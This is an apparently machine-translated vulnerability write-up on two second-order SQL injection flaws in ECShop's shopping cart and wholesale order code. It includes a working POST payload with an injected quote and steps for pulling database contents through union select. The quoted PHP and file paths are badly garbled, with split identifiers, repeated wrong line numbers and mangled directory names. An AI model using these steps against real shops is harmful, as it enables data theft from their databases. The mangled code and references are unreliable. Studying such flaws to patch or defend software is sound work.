The goods_attr and goods_attr_id vulnerabilities of ecshop

I. Secondary Injection of goods_attr_id

Injection and exploitation process:

1. When adding a product to the shopping cart, write the injection code to the product property id.

Http: // localhost/test/ecshop/flow. php? Step = add_to_cart

POST: goods={ "quick" :1, "spec" :[ "163" , "158'" ], "goods_id" :32, "number" : "1" , "parent" :0}

Note that spec must have two or more IDs

2. on the "view shopping cart" page, click "Update Shopping Cart" and run the injection code (second injection, single quotation marks are available)

Code Analysis
1./includes/lib_goods.php 942 line

 

Function spec_price ($ spec) {if (! Empty ($ spec) {$ where = db_create_in ($ spec, 'goods _ attr_id '); // The injection location, $ SQL = 'select SUM (attr_price) AS attr_price from '. $ GLOBALS ['ecs']-> table ('goods _ attr '). "WHERE $ where"; $ price = floatval ($ GLOBALS ['db']-> getOne ($ SQL);} else {$ price = 0 ;} return $ price ;}

 

2. The call to get_final_price in line 2 of/includes/lib_common.php has spec_price

3. Let's look at the call of the get_final_price method in the ecshop/flow. php flow_update_cart method, Row 3.

 

/* Process common products or non-promotional accessories */else {$ attr_id = empty ($ goods ['goods _ attr_id '])? Array (): explode (',', $ goods ['goods _ attr_id ']); // check that $ attr_id is the goods_attr_id field of the read shopping cart item, therefore, you only need to write the injection code when adding the item to the shopping cart. $ goods_price = get_final_price ($ goods ['goods _ id'], $ val, true, $ attr_id ); // UPDATE the quantity of items in the shopping cart $ SQL = "UPDATE ". $ GLOBALS ['ecs']-> table ('cart '). "SET goods_number = '$ val', goods_price = '$ goods_price' WHERE rec_id = '$ key' AND session_id = '". SESS_ID. "'";}

Ii. Secondary Injection of good_attr
1. Insert the injection code (goods_attr) to the order item (/wholesale. php can be inserted, that is, the commodity wholesale page.

2. Place the order generated by 1 in the user center order view page and perform the "back to shopping cart" operation.

3. view the shopping cart page and inject code for execution.

Code Analysis:
1./shortdes/lib_order.php get_cart_goods () method (read the item in the shopping cart), starting from 1626

/* Query type */if (trim ($ row ['goods _ attr '])! = '') {$ SQL =" SELECT attr_value FROM ". $ GLOBALS ['ecs']-> table ('goods _ attr '). "WHERE goods_attr_id ". db_create_in ($ row ['goods _ attr ']); // goods_attr is the attribute of the shopping cart item, so it is okay to control the injection code to enter the shopping cart item, this is the cause of secondary injection $ attr_list = $ GLOBALS ['db']-> getCol ($ SQL); foreach ($ attr_list AS $ attr) {$ row ['goods _ name']. = '['. $ attr. ']'; // The union select method can query the database content and display it on the page }}

 

2./wholesale. php starts from row 3 (submit the item to the shopping cart, but actually submit it to $ _ SESSION)

 

/* Optional * // -- add to shopping cart/* -------------------------------------------------- */elseif ($ _ REQUEST ['ac'] = 'add _ to_cart ') {/* obtain the parameter */$ act_id = intval ($ _ POST ['act _ id']); $ goods_number = $ _ POST ['goods _ number'] [$ act_id]; $ attr_id = isset ($ _ POST ['attr _ id'])? $ _ POST ['attr _ id']: array (); if (isset ($ attr_id [$ act_id]) {$ goods_attr = $ attr_id [$ act_id]; // controllable. You can refer to the submitted data constructed by me in }...

 

3. From line 3/wholesale. php (act = 'submit _ Order'), write the data in $ _ SESSION to the order

/* Insert ORDER item */foreach ($ _ SESSION ['wholesale _ goods '] as $ goods) {// if there is an item $ product_id = 0; if (! Empty ($ goods ['goods _ attr_id ']) {$ goods_attr_id = array (); foreach ($ goods ['goods _ attr_id'] as $ value) {$ goods_attr_id [$ value ['attr _ id'] = $ value ['attr _ val_id '];} ksort ($ goods_attr_id ); $ goods_attr = implode ('|', $ goods_attr_id); $ SQL = "SELECT product_id FROM ". $ ecs-> table ('products '). "WHERE goods_attr = '$ goods_attr' AND goods_id = '". $ goods ['goods _ id']. "'"; $ product_id = $ db-> getOne ($ SQL);} $ SQL = "INSERT ". $ ecs-> table ('order _ goods '). "(". "order_id, goods_id, goods_name, goods_sn, product_id, goods_number, market_price ,". "goods_price, goods_attr, is_real, extension_code, parent_id, is_gift )". "SELECT '$ new_order_id', goods_id, goods_name, goods_sn, '$ product_id', '$ goods [goods_number]', market_price ,". "'$ goods [goods_price]', '$ goods [goods_attr]', is_real, extension_code, 0, 0 ". "FROM ". $ ecs-> table ('goods '). "WHERE goods_id = '$ goods [goods_id]'"; $ db-> query ($ SQL );

 

4. up to 3, you can write the injection code to the order item table (order_goods). Next, you can enter the shopping cart data table and view the order in the user center with a "back to shopping cart" operation, order items can be placed in the shopping cart data table (cart,
Then you can see the injection result on the/flow. php page of the shopping cart (see code analysis in 1)
Start from line 3 of/effecdes/lib_transaction.php return_to_cart

... // The item to return to the shopping cart // about 923 rows $ return_goods = array ('goods _ id' => $ row ['goods _ id'], 'Goods _ sn '=> addslashes ($ goods ['goods _ sn']), 'goods _ name' => addslashes ($ goods ['goods _ name']), 'market _ price' => $ goods ['market _ price'], 'goods _ price' => $ goods ['goods _ price'], 'Goods _ number' => $ row ['goods _ number'], 'goods _ attr '=> empty ($ row ['goods _ attr'])? '': Addslashes ($ row ['goods _ attr ']), // you can see it here. $ row is an order product. Although addslashes is used, this is a secondary injection, in the end, the database will be retrieved for query (see code analysis in 1) 'goods _ attr_id '=> empty ($ row ['goods _ attr_id'])? '': $ Row ['goods _ attr_id '], 'is _ real' => $ goods ['is _ real'], 'extension _ Code' => addslashes ($ goods ['extension _ Code']), 'parent _ id' => '0 ', 'Is _ gift '=> '0', 'rec _ type' => CART_GENERAL_GOODS );...